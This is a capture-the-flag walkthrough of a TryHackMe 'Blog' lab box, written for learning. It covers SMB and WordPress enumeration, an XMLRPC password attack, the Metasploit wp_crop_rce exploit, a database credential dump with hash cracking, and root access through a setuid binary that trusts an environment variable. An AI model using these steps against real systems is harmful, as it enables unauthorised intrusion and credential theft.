Introduction

Billy Joel made a blog on his home computer and has started working on it. It’s going to be so awesome!

Enumerate this box and find the 2 flags that are hiding on it! Billy has some weird things going on his laptop. Can you maneuver around and get what you need? Or will you fall down the rabbit hole….

This is another medium rated box.

Ports

nmap says we’ve got 22 (SSH), 80 (HTTP) plus 139 and 445 (SMB).

SMB

We can enumerate the shares with smbclient and then login to the BillySMB share, from where we can retrieve a PNG image of a QR code, an MP4 and a JPEG of the White Rabbit from Alice in Wonderland. The QR code leads to a Billy Joel YouTube video and the JPEG can be popped open with steghide to reveal a message advising it is a rabbit hole. The video is a Taylor Swift song interwoven with a goat bleating.

Let’s put aside the contents of the SMB share for now.

Website

Firstly we add blog.thm to /etc/hosts. This may not be necessary but I usually do it anyway.

The website makes it pretty obvious it’s running WordPress, so we’ll run wpscan:

root@kali:/opt/tryhackme/blog# wpscan --url http://blog.thm -e -v

From this we get two usernames (bjoel and kwheel), and learn that XMLRPC is open. There is an authenticated RCE vulnerability in this version of Wordpress, but we’ll need some credentials so an XMLRPC password attack seems a reasonable course of action.

Wpscan can do the XMLRPC attack, but I used Burp Turbo Intruder. Doing we, so obtain the password cutiepie1 for user kwheel.

Metasploit

There is a metasploit module we can use to run the exploit, which is

msf5 exploit(multi/http/wp_crop_rce) >

Once I’m in I just drop into shell and spawn bash:

python3 -c 'import pty;pty.spawn("/bin/bash");'

We can find the database credentials in wp-config.php:

/ MySQL database username /
define(‘DB_USER’, ‘wordpressuser’);
/ MySQL database password /
define(‘DB_PASSWORD’, ‘LittleYellowLamp90!@’);

And then we can log into the database:

www-data@blog:/dev/shm$ mysql --host=127.0.0.1 --port 3306 -u wordpressuser -p

Enter password: LittleYellowLamp90!@
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 38102
Server version: 5.7.30-0ubuntu0.18.04.1 (Ubuntu)

Database

Once we are in, we can get the hashed passwords:

mqsql> show databases;
mysql> use blog;
mysql> show tables;
mysql> select * from wp_users;
select * from wp_users;

For bjoel:

$P$BjoFHe8zIyjnQe/CBvaltzzC6ckPcO/

and for kwheel:

$P$BedNwvQ29vr1TPd80CDl6WnHyjr8te.

Hashcat happily cracks cutiepie1 for kwheel, but won’t do the bjoel hash with rockyou and best64 rules, so presumably we need to look elsewhere.

Elsewhere

With some enumeration (via linenum.sh or otherwise) we can find a slightly unusual binary: /usr/sbin/checker

Running this binary we get the message ‘Not an admin’. Curious. We can download the file and trivially dissamble it with Ghidra, which reveals the following:

int main(void) {
  char *isAdmin;
  isAdmin = getenv("admin");
  if (isAdmin == (char *)0x0) {
    puts("Not an Admin");
  } else {
    setuid(0);
    system("/bin/bash");
  }
  return 0;
}

Essentially if the environment variable ‘admin’ exists and is not zero, we will get a root shell.

So let’s do that then

It’s fairly simple:

www-data@blog:/$ admin=1 // to set the value  
www-data@blog:/$ echo $admin // to check it worked okay  
www-data@blog:/$ export admin // to set it as an environment variable  
www-data@blog:/$ printenv // to make sure *that* worked

And that’s it. Now run

www-data@blog:/$ /usr/sbin/checker

And we get:

root@blog:/#

And we can retrieve the flags.